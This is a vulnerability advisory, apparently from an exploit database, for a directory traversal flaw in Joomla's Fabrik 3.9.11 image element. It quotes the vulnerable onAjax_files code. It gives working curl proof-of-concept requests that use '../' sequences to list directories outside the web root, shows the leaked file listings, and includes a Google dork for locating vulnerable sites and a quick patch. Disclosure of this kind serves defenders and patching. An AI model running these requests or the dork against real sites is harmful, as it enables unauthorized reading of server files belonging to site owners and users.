Joomla Fabrik 3.9.11 Directory Traversal

2020.03.30
Credit: qw3rTyTy
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

# Exploit Title: Joomla! com_fabrik 3.9.11 - Directory Traversal #Google Dork: inurl:"index.php?option=com_fabrik" #Date: 2020-03-30 #Exploit Author: qw3rTyTy #Vendor Homepage: https://fabrikar.com/ #Software Link: https://fabrikar.com/downloads #Version: 3.9 #Tested on: Debian/Nginx/Joomla! 3.9.11 ################################################################## #Vulnerability details ################################################################## File: fabrik_element/image/image.php Func: onAjax_files 394 public function onAjax_files() 395 { 396 $this->loadMeForAjax(); 397 $folder = $this->app->input->get('folder', '', 'string'); //!!!Possible to directory-traversal. 398 399 if (!strstr($folder, JPATH_SITE)) 400 { 401 $folder = JPATH_SITE . '/' . $folder; 402 } 403 404 $pathA = JPath::clean($folder); 405 $folder = array(); 406 $files = array(); 407 $images = array(); 408 FabrikWorker::readImages($pathA, "/", $folders, $images, $this->ignoreFolders); 409 410 if (!array_key_exists('/', $images)) 411 { 412 $images['/'] = array(); 413 } 414 415 echo json_encode($images['/']); 416 } ################################################################## #PoC ################################################################## $> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/" ...snip... [{"value":"eila.jpg","text":"eila.jpg","disable":false},{"value":"eilanya.jpg","text":"eilanya.jpg","disable":false},{"value":"topsecret.png","text":"topsecret.png","disable":false}] ...snip... $> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../home/user123/Pictures/" ...snip... [{"value":"Revision2017_Banner.jpg","text":"Revision2017_Banner.jpg","disable":false},{"value":"Screenshot from 2019-02-23 22-43-54.png","text":"Screenshot from 2019-02-23 22-43-54.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-22.png","text":"Screenshot from 2019-03-09 14-59-22.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-25.png","text":"Screenshot from 2019-03-09 14-59-25.png","disable":false},{"value":"Screenshot from 2019-03-16 23-17-05.png","text":"Screenshot from 2019-03-16 23-17-05.png","disable":false},{"value":"Screenshot from 2019-03-18 07-30-41.png","text":"Screenshot from 2019-03-18 07-30-41.png","disable":false},{"value":"Screenshot from 2019-03-18 08-23-45.png","text":"Screenshot from 2019-03-18 08-23-45.png","disable":false},{"value":"Screenshot from 2019-04-08 00-09-36.png","text":"Screenshot from 2019-04-08 00-09-36.png","disable":false},{"value":"Screenshot from 2019-04-08 10-34-23.png","text":"Screenshot from 2019-04-08 10-34-23.png","disable":false},{"value":"Screenshot from 2019-04-13 08-23-48.png","text":"Screenshot from 2019-04-13 08-23-48.png","disable":false},{"value":"Screenshot from 2019-05-24 23-14-05.png","text":"Screenshot from 2019-05-24 23-14-05.png","disable":false},{"value":"b.jpg","text":"b.jpg","disable":false},{"value":"by_gh0uli.tumblr.com-8755.png.jpeg","text":"by_gh0uli.tumblr.com-8755.png.jpeg","disable":false},{"value":"max_payne_06.jpg","text":"max_payne_06.jpg","disable":false},{"value":"xxx.jpg","text":"xxx.jpg","disable":false}] ...snip... ################################################################## #Q&D Patch (DO NOT USE :3) ################################################################## --- ./image.php --- +++ image_patched.php --- @@ -394,7 +394,7 @@ public function onAjax_files() { $this->loadMeForAjax(); - $folder = $this->app->input->get('folder', '', 'string'); + $folder = $this->app->input->get('folder', '', 'cmd'); if (!strstr($folder, JPATH_SITE)) {


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top